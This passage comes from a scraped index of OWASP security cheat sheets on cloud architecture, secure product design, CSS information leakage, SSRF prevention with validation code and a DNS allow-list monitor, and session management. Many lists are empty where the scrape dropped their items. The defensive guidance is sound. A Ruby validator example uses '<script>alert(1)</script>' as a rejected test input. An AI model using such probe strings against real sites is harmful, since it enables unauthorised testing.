By nature, this approach limits the pros and cons of both previous examples. This model will likely be used for most applications, unless the benefits of the above examples are necessary to meet business requirements.

Pros Cons Secured based on risk Known gaps in security Cost/Efficiency derived from criticality

Note: This trust methodology diverges from Zero Trust. For a more in depth look at that topic, check out CISA's Zero Trust Maturity Model.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#security-tooling","title":"Security Tooling","text":""},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#web-application-firewall","title":"Web Application Firewall","text":"

Web application firewalls (WAF) are used to monitor or block common attack payloads (like XSS and SQLi), or allow only specific request types and patterns. Applications should use them as a first line of defense, attaching them to entry points like load balancers or API gateways, to handle potentially malicious content before it reaches application code. Cloud providers curate base rule sets which will block or monitor common malicious payloads:

By design these rule sets are generic and will not cover every attack type an application will face. Consider creating custom rules which will fit the application's specific security needs, like:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging-monitoring","title":"Logging & Monitoring","text":"

Logging and monitoring is required for a truly secure application. Developers should know exactly what is going on in their environment, making use of alerting mechanisms to warn engineers when systems are not working as expected. Additionally, in the event of a security incident, logging should be verbose enough to track a threat actor through an entire application, and provide enough knowledge for respondents to understand what actions were taken against what resources. Note that proper logging and monitoring can be expensive, and risk/cost trade-offs should be discussed when putting logging in place.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#logging","title":"Logging","text":"

For proper logging, consider:

Legal and compliance representatives should weigh in on log retention times for the specific application.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#monitoring","title":"Monitoring","text":"

For proper monitoring consider adding:

Anomalies by count and type can vary wildly from app to app. A proper understanding of what qualifies as an anomaly requires an environment specific baseline. Therefore, the percentages mentioned above should be chosen based off that baseline, in addition to considerations like risk and team response capacity.

WAFs can also have monitoring or alerting attached to them for counting malicious payloads or (in some cases) anomalous activity detection.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#ddos-protection","title":"DDoS Protection","text":"

Cloud service companies offer a range of simple and advanced DDoS protection products, depending on application needs. Simple DDOS protection can often be employed using WAFs with rate limits and route blocking rules, while more advanced protection may require specific managed tooling offered by the cloud provider. Examples include:

The decision to enable advanced DDoS protections for a specific application should be based off risk and business criticality of application, taking into account mitigating factors and cost (these services can be very inexpensive compared to large company budgets).

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#self-managed-tooling-maintenance","title":"Self-managed tooling maintenance","text":"

Cloud providers generally offer tooling on a spectrum of management. Fully managed services leave very little for the end developer to handle besides coding functionality, while self-managed systems require much more overhead to maintain.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#update-strategy-for-self-managed-services","title":"Update Strategy for Self-managed Services","text":"

Self-managed tooling will require additional overhead by developers and support engineers. Depending on the tool, basic version updates, upgrades to images like AMIs or Compute Images, or other operating system level maintence will be required. Use automation to regularly update minor versions or images, and schedule time in development cycles for refreshing stale resources.

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#avoid-gaps-in-managed-service-security","title":"Avoid Gaps in Managed Service Security","text":"

Managed services will offer some level of security, like updating and securing the underlying hardware which runs application code. However, the development team are still responsible for many aspects of security in the system. Ensure developers understand what security will be their responsibility based on tool selection. Likely the following will be partially or wholly the responsibility of the developer:

Use documentation from the cloud provider to understand which security will be the responsbility of what party. Examples of this research for serverless functions:

"},{"location":"cheatsheets/Secure_Cloud_Architecture_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html","title":"Secure Product Design Cheat Sheet","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The purpose of Secure Product Design is to ensure that all products meet or exceed the security requirements laid down by the organization as part of the development lifecycle and to ensure that all security decisions made about the product being developed are explicit choices and result in the correct level of security for the product being developed.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#methodology","title":"Methodology","text":"

As a basic start, establish secure defaults, minimise the attack surface area, and fail securely to those well-defined and understood defaults.

Secure Product Design comes about through two processes:

  1. Product Inception; and
  2. Product Design

The first process happens when a product is conceived, or when an existing product is being re-invented. The latter is continuous, evolutionary, and done in an agile way, close to where the code is being written.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-principles","title":"Security Principles","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-the-principle-of-least-privilege-and-separation-of-duties","title":"1. The principle of Least Privilege and Separation of Duties","text":"

Least Privilege is a security principle that states that users should only be given the minimum amount of access necessary to perform their job. This means that users should only be given access to the resources they need to do their job, and no more. This helps to reduce the risk of unauthorized access to sensitive data or systems, as users are only able to access the resources they need. Least Privilege is an important security principle that should be followed in order to ensure the security of an organization's data and systems.

Separation of duties is a fundamental principle of internal control in business and organizations. It is a system of checks and balances that ensures that no single individual has control over all aspects of a transaction. This is done by assigning different tasks to different people, so that no one person has control over the entire process. This helps to reduce the risk of fraud and errors, as well as ensuring that all tasks are completed in a timely manner. Separation of duties is an important part of any organization's internal control system, and is essential for maintaining the integrity of the organization's financial records.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-the-principle-of-defense-in-depth","title":"2. The principle of Defense-in-Depth","text":"

The principle of Defense-in-Depth is a security strategy that involves multiple layers of security controls to protect an organization\u2019s assets. It is based on the idea that if one layer of security fails, the other layers will still be able to protect the asset. The layers of security can include physical security, network security, application security, and data security. The goal of Defense-in-Depth is to create a secure environment that is resilient to attack and can quickly detect and respond to any security incidents. By implementing multiple layers of security, organizations can reduce the risk of a successful attack and minimize the damage caused by any successful attack.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-the-principle-of-zero-trust","title":"3. The principle of Zero Trust","text":"

Zero Trust is a security model that assumes that all users, devices, and networks are untrusted and must be verified before access is granted. It is based on the idea that organizations should not trust any user, device, or network, even if they are inside the organization\u2019s network. Instead, all requests for access must be authenticated and authorized before access is granted. Zero Trust also requires organizations to continuously monitor and audit user activity to ensure that access is only granted to those who need it. This model is designed to reduce the risk of data breaches and other security incidents by ensuring that only authorized users have access to sensitive data.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-the-principle-of-security-in-the-open","title":"4. The principle of Security-in-the-Open","text":"

Security-in-the-Open is a concept that emphasizes the importance of security in open source software development. It focuses on the need for developers to be aware of the security implications of their code and to take steps to ensure that their code is secure. This includes using secure coding practices, testing for vulnerabilities, and using secure development tools. Security-in-the-Open also encourages developers to collaborate with security experts to ensure that their code is secure.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#security-focus-areas","title":"Security Focus Areas","text":""},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#1-context","title":"1. Context","text":"

Where does this application under consideration fit into the ecosystem of the organization, which departments use it and for what reason? What kinds of data might it contain, and what is the risk profile as a result?

The processes employed to build the security context for an application include Threat Modeling - which results in security related stories being added during Product Design at every iteration of product delivery - and when performing a Business Impact Assessment - which results in setting the correct Product Security Levels for a given product during Product Inception.

Context is all important because over-engineering for security can have even greater cost implications than over-engineering for scale or performance, but under-engineering can have devastating consequences too.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#2-components","title":"2. Components","text":"

From libraries in use by the application (selected during any Product Design stage) through to external services it might make use of (changing of which happen during Product Inception), what makes up this application and how are those parts kept secure? In order to do this we leverage a library of secure design patterns and ready to use components defined in your Golden Path / Paved Road documentation and by analyzing those choices through Threat Modeling.

A part of this component review must also include the more commercial aspects of selecting the right components (licensing and maintenance) as well as the limits on usage that might be required.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#3-connections","title":"3. Connections","text":"

How do you interact with this application and how does it connect to those components and services mentioned before? Where is the data stored and how is it accessed? Connections can also describe any intentional lack of connections. Think about the segregation of tiers that might be required depending on the Product Security Levels required and the potential segregation of data or whole environments if required for different tenants.

Adding (or removing) connections is probably a sign that Product Inception is happening.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#4-code","title":"4. Code","text":"

Code is the ultimate expression of the intention for a product and as such it must be functional first and foremost. But there is a quality to how that functionality is provided that must meet or exceed the expectations of it.

Some basics of secure coding include:

  1. Input validation: Verify that all input data is valid and of the expected type, format, and length before processing it. This can help prevent attacks such as SQL injection and buffer overflows.
  2. Error handling: Handle errors and exceptions in a secure manner, such as by logging them in a secure way and not disclosing sensitive information to an attacker.
  3. Authentication and Authorization: Implement strong authentication and authorization mechanisms to ensure that only authorized users can access sensitive data and resources.
  4. Cryptography: Use cryptographic functions and protocols to protect data in transit and at rest, such as HTTPS and encryption - the expected levels for a given Product Security Level can often be found by reviewing your Golden Path / Paved Road documentation.
  5. Least privilege: Use the principle of the least privilege when writing code, such that the code and the system it runs on are given the minimum access rights necessary to perform their functions.
  6. Secure memory management: Use high-level languages recommended in your Golden Path / Paved Road documentation or properly manage memory to prevent memory-related vulnerabilities such as buffer overflows and use-after-free.
  7. Avoiding hardcoded secrets: Hardcoded secrets such as passwords and encryption keys should be avoided in the code and should be stored in a secure storage.
  8. Security testing: Test the software for security vulnerabilities during development and just prior to deployment.
  9. Auditing and reviewing the code: Regularly audit and review the code for security vulnerabilities, such as by using automated tools or having a third party review the code.
  10. Keeping up-to-date: Keep the code up-to-date with the latest security best practices and vulnerability fixes to ensure that the software is as secure as possible.

Ensure that you integrate plausibility checks at each tier of your application (e.g., from frontend to backend) and ensure that you write unit and integration tests to validate that all threats discovered during Threat Modeling have been mitigated to a level of risk acceptable to the organization. Use that to compile use-cases and abuse-cases for each tier of your application.

"},{"location":"cheatsheets/Secure_Product_Design_Cheat_Sheet.html#5-configuration","title":"5. Configuration","text":"

Building an application securely can all too easily be undone if it's not securely configured. At a minimum we should ensure the following:

  1. Bearing in mind the principle of Least Privilege: Limit the access and permissions of system components and users to the minimum required to perform their tasks.
  2. Remembering Defense-in-Depth: Implement multiple layers of security controls to protect against a wide range of threats.
  3. Ensuring Secure by Default: Configure systems and software to be secure by default, with minimal manual setup or configuration required.
  4. Secure Data: Protect sensitive data, such as personal information and financial data, by encrypting it in transit and at rest. Protecting that data also means ensuring it's correctly backed up and that the data retention is set correctly for the desired Product Security Level.
  5. Plan to have the configuration Fail Securely: Design systems to fail in a secure state, rather than exposing vulnerabilities when they malfunction.
  6. Always use Secure Communications: Use secure protocols for communication, such as HTTPS, to protect against eavesdropping and tampering.
  7. Perform regular updates - or leverage maintained images: Keeping software, docker images and base operating systems up-to-date with the latest security patches is an essential part of maintaining a secure system.
  8. Have a practiced Security Incident response plan: Having a plan in place for how to respond to a security incident is essential for minimizing the damage caused by any successful attack and a crucial part of the Product Support Model.

Details of how to precisely ensure secure configuration can be found in Infrastructure as Code Security Cheat Sheet

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html","title":"Securing Cascading Style Sheets Cheat Sheet","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The goal of this CSS (Not XSS, but Cascading Style Sheet) Cheat Sheet is to inform Programmers, Testers, Security Analysts, Front-End Developers and anyone who is interested in Web Application Security to use these recommendations or requirements in order to achieve better security when authoring Cascading Style Sheets.

Let's demonstrate this risk with an example:

Santhosh is a programmer who works for a company called X and authors a Cascading Style Sheet to implement styling of the web application. The application for which he is writing CSS Code has various roles like Student, Teacher, Super User & Administrator and these roles have different permissions (PBAC - Permission Based Access Control) and Roles (RBAC - Role Based Access Control). Not only do these roles have different access controls, but these roles could also have different styling for webpages that might be specific to an individual or group of roles.

Santhosh thinks that it would a great optimized idea to create a \"global styling\" CSS file which has all the CSS styling/selectors for all of the roles. According to their role, a specific feature or user interface element will be rendered. For instance, Administrator will have different features compared to Student or Teacher or SuperUser. However, some permissions or features maybe common to some roles.

Example: Profile Settings will be applicable to all the users here while Adding Users or Deleting Users is only applicable for Administrator.

Example:

Now, let's examine what are the risks associated with this style of coding.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-1","title":"Risk #1","text":"

Motivated Attackers always take a look at *.CSS files to learn the features of the application even without being logged in.

For instance: Jim is a motivated attacker and always tries to look into CSS files from the View-Source even before other attacks. When Jim looks into the CSS file, they see that there are different features and different roles based on the CSS selectors like .profileSettings, .editUser, .addUser, .deleteUser and so on. Jim can use the CSS for intel gathering to help gain access to sensitive roles. This is a form of attacker due diligence even before trying to perform dangerous attacks to gain access to the web application.

In a nutshell, having global styling could reveal sensitive information that could be beneficial to the attacker.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#risk-2","title":"Risk #2","text":"

Let's say, Santhosh has this habit of writing the descriptive selector names like .profileSettings, exportUserData, .changePassword, .oldPassword, .newPassword, .confirmNewPassword etc. Good programmers like to keep code readable and usable by other Code Reviewers of the team. The risk is that attackers could map these selectors to actual features of a web application.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defensive-mechanisms-to-mitigate-attackers-motivation","title":"Defensive Mechanisms to Mitigate Attacker's Motivation","text":""},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-1","title":"Defense Mechanism #1","text":"

As a CSS Coder / Programmer, always keep the CSS isolated by access control level. By this, it means Student will have a different CSS file called as StudentStyling.CSS while Administrator has AdministratorStyling.CSS and so on. Make sure these *.CSS files are accessed only for a user with the proper access control level. Only users with the proper access control level should be able to access their *.CSS file.

If an authenticated user with the Student Role tries to access AdministratorStyling.CSS through forced browsing, an alert that an intrusion is occurring should be recorded.

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-2","title":"Defense Mechanism #2","text":"

Another option is to modify your CSS files to remove any identifying information. As a general rule, it's recommended that your website have a consistent style between pages, and it's best to write your general CSS rules in such a way that they apply across multiple pages. This reduces the need for specific selectors in the first place. Furthermore, it's often possible to create CSS selectors that target specific HTML elements without using IDs or class names. For example, #UserPage .Toolbar .addUserButton could be rewritten to something more obscure such as #page_u header button:first-of-type.

Build-time and runtime tools also exist, which can be integrated to obfuscate your class names. This can reduce the chance of an attacker guessing the features of your application. Some examples:

"},{"location":"cheatsheets/Securing_Cascading_Style_Sheets_Cheat_Sheet.html#defense-mechanism-3","title":"Defense Mechanism #3","text":"

Web applications that allow users to author content via HTML input could be vulnerable to malicious use of CSS. Uploaded HTML could use styles that are allowed by the web application but could be used for purposes other than intended which could lead to security risks.

Example: You can read about how LinkedIn had a vulnerability which allowed malicious use of CSS to execute a Clickjacking attack. This caused the document to enter a state where clicking anywhere on the page would result in loading a potentially malicious website. You can read more about mitigating clickjacking attacks here.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html","title":"Server-Side Request Forgery Prevention Cheat Sheet","text":""},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The objective of the cheat sheet is to provide advices regarding the protection against Server Side Request Forgery (SSRF) attack.

This cheat sheet will focus on the defensive point of view and will not explain how to perform this attack. This talk from the security researcher Orange Tsai as well as this document provide techniques on how to perform this kind of attack.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#context","title":"Context","text":"

SSRF is an attack vector that abuses an application to interact with the internal/external network or the machine itself. One of the enablers for this vector is the mishandling of URLs, as showcased in the following examples:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#overview-of-a-ssrf-common-flow","title":"Overview of a SSRF common flow","text":"

Notes:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#cases","title":"Cases","text":"

Depending on the application's functionality and requirements, there are two basic cases in which SSRF can happen:

Because these two cases are very different, this cheat sheet will describe defences against them separately.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-1-application-can-send-request-only-to-identified-and-trusted-applications","title":"Case 1 - Application can send request only to identified and trusted applications","text":"

Sometimes, an application needs to perform a request to another application, often located on another network, to perform a specific task. Depending on the business case, user input is required for the functionality to work.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#example","title":"Example","text":"

Take the example of a web application that receives and uses personal information from a user, such as their first name, last name, birth date etc. to create a profile in an internal HR system. By design, that web application will have to communicate using a protocol that the HR system understands to process that data. Basically, the user cannot reach the HR system directly, but, if the web application in charge of receiving user information is vulnerable to SSRF, the user can leverage it to access the HR system. The user leverages the web application as a proxy to the HR system.

The allow list approach is a viable option since the internal application called by the VulnerableApplication is clearly identified in the technical/business flow. It can be stated that the required calls will only be targeted between those identified and trusted applications.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections","title":"Available protections","text":"

Several protective measures are possible at the Application and Network layers. To apply the defense in depth principle, both layers will be hardened against such attacks.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer","title":"Application layer","text":"

The first level of protection that comes to mind is Input validation.

Based on that point, the following question comes to mind: How to perform this input validation?

As Orange Tsai shows in his talk, depending on the programming language used, parsers can be abused. One possible countermeasure is to apply the allow list approach when input validation is used because, most of the time, the format of the information expected from the user is globally known.

The request sent to the internal application will be based on the following information:

Note: Disable the support for the following of the redirection in your web client in order to prevent the bypass of the input validation described in the section Exploitation tricks > Bypassing restrictions > Input validation > Unsafe redirect of this document.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#string","title":"String","text":"

In the context of SSRF, validations can be added to ensure that the input string respects the business/technical format expected.

A regex can be used to ensure that data received is valid from a security point of view if the input data have a simple format (e.g. token, zip code, etc.). Otherwise, validation should be conducted using the libraries available from the string object because regex for complex formats are difficult to maintain and are highly error-prone.

User input is assumed to be non-network related and consists of the user's personal information.

Example:

//Regex validation for a data having a simple format\nif(Pattern.matches(\"[a-zA-Z0-9\\\\s\\\\-]{1,50}\", userInput)){\n//Continue the processing because the input data is valid\n}else{\n//Stop the processing and reject the request\n}\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#ip-address","title":"IP address","text":"

In the context of SSRF, there are 2 possible validations to perform:

  1. Ensure that the data provided is a valid IP V4 or V6 address.
  2. Ensure that the IP address provided belongs to one of the IP addresses of the identified and trusted applications.

The first layer of validation can be applied using libraries that ensure the security of the IP address format, based on the technology used (library option is proposed here to delegate the managing of the IP address format and leverage battle-tested validation function):

Verification of the proposed libraries has been performed regarding the exposure to bypasses (Hex, Octal, Dword, URL and Mixed encoding) described in this article.

Use the output value of the method/library as the IP address to compare against the allow list.

After ensuring the validity of the incoming IP address, the second layer of validation is applied. An allow list is created after determining all the IP addresses (v4 and v6 to avoid bypasses) of the identified and trusted applications. The valid IP is cross-checked with that list to ensure its communication with the internal application (string strict comparison with case sensitive).

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#domain-name","title":"Domain name","text":"

In the attempt of validate domain names, it is apparent to do a DNS resolution to verify the existence of the domain. In general, it is not a bad idea, yet it opens up the application to attacks depending on the configuration used regarding the DNS servers used for the domain name resolution:

In the context of SSRF, there are two validations to perform:

  1. Ensure that the data provided is a valid domain name.
  2. Ensure that the domain name provided belongs to one of the domain names of the identified and trusted applications (the allow listing comes to action here).

Similar to the IP address validation, the first layer of validation can be applied using libraries that ensure the security of the domain name format, based on the technology used (library option is proposed here in order to delegate the managing of the domain name format and leverage battle tested validation function):

Verification of the proposed libraries has been performed to ensure that the proposed functions do not perform any DNS resolution query.

Example of execution of the proposed regex for Ruby:

domain_names = [\"owasp.org\",\"owasp-test.org\",\"doc-test.owasp.org\",\"doc.owasp.org\",\n\"<script>alert(1)</script>\",\"<script>alert(1)</script>.owasp.org\"]\ndomain_names.each { |domain_name|\nif ( domain_name =~ /^(((?!-))(xn--|_{1,1})?[a-z0-9-]{0,61}[a-z0-9]{1,1}\\.)*(xn--)?([a-z0-9][a-z0-9\\-]{0,60}|[a-z0-9-]{1,30}\\.[a-z]{2,})$/ )\nputs \"[i] #{domain_name} is VALID\"\nelse\nputs \"[!] #{domain_name} is INVALID\"\nend\n}\n
$ ruby test.rb\n[i] owasp.org is VALID\n[i] owasp-test.org is VALID\n[i] doc-test.owasp.org is VALID\n[i] doc.owasp.org is VALID\n[!] <script>alert(1)</script> is INVALID\n[!] <script>alert(1)</script>.owasp.org is INVALID\n

After ensuring the validity of the incoming domain name, the second layer of validation is applied:

  1. Build an allow list with all the domain names of every identified and trusted applications.
  2. Verify that the domain name received is part of this allow list (string strict comparison with case sensitive).

Unfortunately here, the application is still vulnerable to the DNS pinning bypass mentioned in this document. Indeed, a DNS resolution will be made when the business code will be executed. To address that issue, the following action must be taken in addition of the validation on the domain name:

  1. Ensure that the domains that are part of your organization are resolved by your internal DNS server first in the chains of DNS resolvers.
  2. Monitor the domains allow list in order to detect when any of them resolves to a/an:
  3. Local IP address (V4 + V6).
  4. Internal IP of your organization (expected to be in private IP ranges) for the domain that are not part of your organization.

The following Python3 script can be used, as a starting point, for the monitoring mentioned above:

# Dependencies: pip install ipaddress dnspython\nimport ipaddress\nimport dns.resolver\n\n# Configure the allow list to check\nDOMAINS_ALLOWLIST = [\"owasp.org\", \"labslinux\"]\n\n# Configure the DNS resolver to use for all DNS queries\nDNS_RESOLVER = dns.resolver.Resolver()\nDNS_RESOLVER.nameservers = [\"1.1.1.1\"]\n\ndef verify_dns_records(domain, records, type):\n\"\"\"\n    Verify if one of the DNS records resolve to a non public IP address.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    if records is not None:\n        for record in records:\n            value = record.to_text().strip()\n            try:\n                ip = ipaddress.ip_address(value)\n                # See https://docs.python.org/3/library/ipaddress.html#ipaddress.IPv4Address.is_global\n                if not ip.is_global:\n                    print(\"[!] DNS record type '%s' for domain name '%s' resolve to\n                    a non public IP address '%s'!\" % (type, domain, value))\n                    error_detected = True\n            except ValueError:\n                error_detected = True\n                print(\"[!] '%s' is not valid IP address!\" % value)\n    return error_detected\n\ndef check():\n\"\"\"\n    Perform the check of the allow list of domains.\n    Return a boolean indicating if any error has been detected.\n    \"\"\"\n    error_detected = False\n    for domain in DOMAINS_ALLOWLIST:\n        # Get the IPs of the current domain\n        # See https://en.wikipedia.org/wiki/List_of_DNS_record_types\n        try:\n            # A = IPv4 address record\n            ip_v4_records = DNS_RESOLVER.query(domain, \"A\")\n        except Exception as e:\n            ip_v4_records = None\n            print(\"[i] Cannot get A record for domain '%s': %s\\n\" % (domain,e))\n        try:\n            # AAAA = IPv6 address record\n            ip_v6_records = DNS_RESOLVER.query(domain, \"AAAA\")\n        except Exception as e:\n            ip_v6_records = None\n            print(\"[i] Cannot get AAAA record for domain '%s': %s\\n\" % (domain,e))\n        # Verify the IPs obtained\n        if verify_dns_records(domain, ip_v4_records, \"A\")\n        or verify_dns_records(domain, ip_v6_records, \"AAAA\"):\n            error_detected = True\n    return error_detected\n\nif __name__== \"__main__\":\n    if check():\n        exit(1)\n    else:\n        exit(0)\n
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#url","title":"URL","text":"

Do not accept complete URLs from the user because URL are difficult to validate and the parser can be abused depending on the technology used as showcased by the following talk of Orange Tsai.

If network related information is really needed then only accept a valid IP address or domain name.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer","title":"Network layer","text":"

The objective of the Network layer security is to prevent the VulnerableApplication from performing calls to arbitrary applications. Only allowed routes will be available for this application in order to limit its network access to only those that it should communicate with.

The Firewall component, as a specific device or using the one provided within the operating system, will be used here to define the legitimate flows.

In the schema below, a Firewall component is leveraged to limit the application's access, and in turn, limit the impact of an application vulnerable to SSRF:

Network segregation (see this set of implementation advice can also be leveraged and is highly recommended in order to block illegitimate calls directly at network level itself.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#case-2-application-can-send-requests-to-any-external-ip-address-or-domain-name","title":"Case 2 - Application can send requests to ANY external IP address or domain name","text":"

This case happens when a user can control a URL to an External resource and the application makes a request to this URL (e.g. in case of WebHooks). Allow lists cannot be used here because the list of IPs/domains is often unknown upfront and is dynamically changing.

In this scenario, External refers to any IP that doesn't belong to the internal network, and should be reached by going over the public internet.

Thus, the call from the Vulnerable Application:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#challenges-in-blocking-urls-at-application-layer","title":"Challenges in blocking URLs at application layer","text":"

Based on the business requirements of the above mentioned applications, the allow list approach is not a valid solution. Despite knowing that the block-list approach is not an impenetrable wall, it is the best solution in this scenario. It is informing the application what it should not do.

Here is why filtering URLs is hard at the Application layer:

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#available-protections_1","title":"Available protections","text":"

Taking into consideration the same assumption in the following example for the following sections.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#application-layer_1","title":"Application layer","text":"

Like for the case n\u00b01, it is assumed that the IP Address or domain name is required to create the request that will be sent to the TargetApplication.

The first validation on the input data presented in the case n\u00b01 on the 3 types of data will be the same for this case BUT the second validation will differ. Indeed, here we must use the block-list approach.

Regarding the proof of legitimacy of the request: The TargetedApplication that will receive the request must generate a random token (ex: alphanumeric of 20 characters) that is expected to be passed by the caller (in body via a parameter for which the name is also defined by the application itself and only allow characters set [a-z]{1,10}) to perform a valid request. The receiving endpoint must only accept HTTP POST requests.

Validation flow (if one the validation steps fail then the request is rejected):

  1. The application will receive the IP address or domain name of the TargetedApplication and it will apply the first validation on the input data using the libraries/regex mentioned in this section.
  2. The second validation will be applied against the IP address or domain name of the TargetedApplication using the following block-list approach:
  3. For IP address:
  4. For domain name: 1. The application will verify that it is a public one by trying to resolve the domain name against the DNS resolver that will only resolve internal domain name. Here, it must return a response indicating that it do not know the provided domain because the expected value received must be a public domain. 2. To prevent the DNS pinning attack described in this document, the application will retrieve all the IP addresses behind the domain name provided (taking records A + AAAA for IPv4 + IPv6) and it will apply the same verification described in the previous point about IP addresses.
  5. The application will receive the protocol to use for the request via a dedicated input parameter for which it will verify the value against an allowed list of protocols (HTTP or HTTPS).
  6. The application will receive the parameter name for the token to pass to the TargetedApplication via a dedicated input parameter for which it will only allow the characters set [a-z]{1,10}.
  7. The application will receive the token itself via a dedicated input parameter for which it will only allow the characters set [a-zA-Z0-9]{20}.
  8. The application will receive and validate (from a security point of view) any business data needed to perform a valid call.
  9. The application will build the HTTP POST request using only validated information and will send it (don't forget to disable the support for redirection in the web client used).
"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#network-layer_1","title":"Network layer","text":"

Similar to the following section.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#imdsv2-in-aws","title":"IMDSv2 in AWS","text":"

In cloud environments SSRF is often used to access and steal credentials and access tokens from metadata services (e.g. AWS Instance Metadata Service, Azure Instance Metadata Service, GCP metadata server).

IMDSv2 is an additional defence-in-depth mechanism for AWS that mitigates some of the instances of SSRF.

To leverage this protection migrate to IMDSv2 and disable old IMDSv1. Check out AWS documentation for more details.

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#semgrep-rules","title":"Semgrep Rules","text":"

Semgrep is a command-line tool for offline static analysis. Use pre-built or custom rules to enforce code and security standards in your codebase. Checkout the Semgrep rule for SSRF to identify/investigate for SSRF vulnerabilities in Java https://semgrep.dev/salecharohit:owasp_java_ssrf

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#references","title":"References","text":"

Online version of the SSRF bible (PDF version is used in this cheat sheet).

Article about Bypassing SSRF Protection.

Articles about SSRF attacks: Part 1, part 2 and part 3.

Article about IMDSv2

"},{"location":"cheatsheets/Server_Side_Request_Forgery_Prevention_Cheat_Sheet.html#tools-and-code-used-for-schemas","title":"Tools and code used for schemas","text":"

Mermaid code for SSRF common flow (printscreen are used to capture PNG image inserted into this cheat sheet):

sequenceDiagram\n    participant Attacker\n    participant VulnerableApplication\n    participant TargetedApplication\n    Attacker->>VulnerableApplication: Crafted HTTP request\n    VulnerableApplication->>TargetedApplication: Request (HTTP, FTP...)\n    Note left of TargetedApplication: Use payload included<br>into the request to<br>VulnerableApplication\n    TargetedApplication->>VulnerableApplication: Response\n    VulnerableApplication->>Attacker: Response\n    Note left of VulnerableApplication: Include response<br>from the<br>TargetedApplication\n

Draw.io schema XML code for the \"case 1 for network layer protection about flows that we want to prevent\" schema (printscreen are used to capture PNG image inserted into this cheat sheet).

"},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html","title":"Session Management Cheat Sheet","text":""},{"location":"cheatsheets/Session_Management_Cheat_Sheet.html#introduction","title":"Introduction","text":"

Web Authentication, Session Management, and Access Control:

A web session is a sequence of network HTTP request and response transactions associated with the same user. Modern and complex web applications require the retaining of information or status about each user for the duration of multiple requests. Therefore, sessions provide the ability to establish variables \u2013 such as access rights and localization settings \u2013 which will apply to each and every interaction a user has with the web application for the duration of the session.

Web applications can create sessions to keep track of anonymous users after the very first user request. An example would be maintaining the user language preference. Additionally, web applications will make use of sessions once the user has authenticated. This ensures the ability to identify the user on any subsequent requests as well as being able to apply security access controls, authorized access to the user private data, and to increase the usability of the application. Therefore, current web applications can provide session capabilities both pre and post authentication.

